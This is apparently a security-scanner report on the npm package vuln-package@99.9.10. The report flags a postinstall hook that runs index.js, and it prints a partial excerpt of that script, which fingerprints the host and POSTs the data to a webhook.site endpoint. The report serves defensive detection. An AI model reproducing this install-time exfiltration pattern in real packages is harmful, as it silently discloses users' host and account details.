registry  /  vuln-package  /  99.9.10

vuln-package@99.9.10

AI Security Review

scanned 3h ago · by lpm-firewall-ai

`postinstall` executes index.js during npm installation. The source attempts to fingerprint the host and exfiltrate it to a webhook, but the undefined `localIP()` call prevents the request path from being reached as shipped.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install of vuln-package@99.9.10
Impact
Would disclose local user and host metadata if the runtime error were corrected.
Mechanism
install-time host fingerprint collection and HTTPS exfiltration attempt
Rationale
The install-time code has clear malicious exfiltration intent, but a source-level runtime error makes the concrete network action unreachable as shipped. Flag it as suspicious rather than blocking a confirmed working attack.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/cde465c1-3853-40ea-880c-fdca6fe508cc

Decision evidence

public snapshot
AI called this Suspicious at 91.0% confidence as Dangerous Capability with low false-positive risk.
Evidence for warning
  • package.json runs `node index.js` via `postinstall`.
  • index.js collects username, working directory, hostname, and intended local IP.
  • index.js POSTs JSON to a third-party webhook URL.
Evidence against
  • `localIP()` is undefined in index.js, causing a ReferenceError while building the payload before the HTTPS request is created.
  • No credential-file access, shell execution, persistence, or payload loading is present.
Behavioral surface
Source
EnvironmentVarsNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 640 B of source, external domains: webhook.site

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
1const os = require('os'); L2: const https = require('https'); L3: L4: const payload = JSON.stringify({ L5: user: os.userInfo().username, L6: cwd: process.env.INIT_CWD || process.cwd(), L7: hostname: os.hostname(), L8: ip : localIP() ... L31: L32: req.write(payload); L33: req.end();
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1

Findings

2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowUrl Strings